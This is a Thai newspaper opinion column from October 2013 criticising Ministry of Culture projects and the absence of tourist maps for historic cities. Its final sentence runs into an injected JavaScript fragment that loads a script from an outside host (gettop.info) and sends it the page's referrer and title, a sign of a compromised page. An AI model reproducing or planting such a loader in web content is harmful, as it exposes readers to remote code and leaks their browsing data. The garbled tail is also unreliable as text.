มติชนรายวัน ฉบับประจำวันอังคารที่ 1 ตุลาคม 2556

แบ่งปันเผยแพร่เพื่อสร้างสรรค์

          กระทรวงวัฒนธรรม มี 4 โครงการ ชื่อยาวๆ ประหลาดๆ โดยอ้างว่าเป็นโครงการสอดคล้องยุทธศาสตร์ประเทศ ด้านเพิ่มขีดความสามารถการแข่งขัน

          โดยนำทุนทางวัฒนธรรมและภูมิปัญญาไทยมาสร้างมูลค่าเพิ่ม สร้างความเสมอภาคและเท่าเทียมกันทางสังคม และแก้ไขปัญหาความมั่นคงจังหวัดชายแดนภาคใต้

          โครงการทั้งหมดมีงานสำคัญอย่างเดียว คือแบ่งปันเผยแพร่ข้อมูลข่าวสารอย่างสม่ำเสมอผ่านสื่อหลากหลายด้วยภาษาง่ายๆ สั้นๆ ตามพยานหลักฐานประวัติศาสตร์โบราณคดี โดยไม่บิดเบือน เช่น พ่อขุนฯไม่มีอำนาจถึงมลายูปัตตานี เป็นต้น

          เพียงเท่านี้ เมื่อทำซ้ำๆ บ่อยๆ (เหมือนขายของเก่า) จนกว่าจะเห็นว่าพอสมควรแล้วก็เปลี่ยนเป็นประเด็นอื่นๆอีก ก็จะผลักดันให้ผู้รับข้อมูลข่าวสารมีพลังทำเศรษฐกิจสร้างสรรค์ต่อไปในอนาคต

          ที่สำคัญคือต้องพิจารณาความดีความชอบให้ผู้ทำงานประเภทนี้เป็นพิเศษ เพราะทำได้ 2 อย่างในคราวเดียวกัน คือ งานบริหารจัดการและงานวิชาการ

          แต่มีปัญหาพากันทำสิ่งไม่ควรทำ สิ่งควรทำก็ไม่ทำ เพราะตีโจทย์ไม่แตก จับสาระสำคัญไม่ได้ ต่างฟูมฟายความเป็นไทยสร้างใหม่เท่านั้น เจ๊งเลย

แผนที่, แผนผัง เพื่อการท่องเที่ยว

          แผนที่, แผนผัง, รูปถ่าย, ฯลฯ พร้อมคำอธิบายง่ายๆ สั้นๆ แสดงตำแหน่งแหล่งประวัติศาสตร์โบราณคดีและศิลปวัฒนธรรมสำคัญๆของชุมชนตำบลบ้านเมืองนั้นๆ

          เหล่านี้เป็นเครื่องมือมีประสิทธิภาพใช้เพิ่มศักยภาพในการแข่งขันด้านการท่องเที่ยวและบริการ ขณะเดียวกันก็แบ่งปันและเผยแพร่ข้อมูลข่าวสารวิชาความรู้ไปด้วยโดยอัตโนมัติ

          แต่หน่วยงานบางแห่งของกระทรวงวัฒนธรรมยังไม่เข้าใจ เลยไม่ให้ความสำคัญเรื่องนี้ จึงไม่มีแผนที่, แผนผังท่องเที่ยวเมืองโบราณสำคัญๆ เช่น อยุธยา, สุโขทัย, ลพบุรี, สุพรรณบุรี

          แม้องค์การมหาชนเพื่อการท่องเที่ยวอย่างยั่งยืนก็ไม่ใส่ใจให้ความสำคัญแผนที่, แผนผัง, ฯลฯ (ต่างจากแผนที่ท่องเที่ยวของ ททท.) อย่างนี้เป็นอันดับแรก เพราะมุ่งแต่สร้างผลกำไรให้กลุ่มเอกชนไม่กี่คนที่ทำของปลอมขาย มากกว่าจะมุ่งแบ่งปันความรู้เพื่อการท่องเที่ยวยั่งยืนอย่างแท้จริงs.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;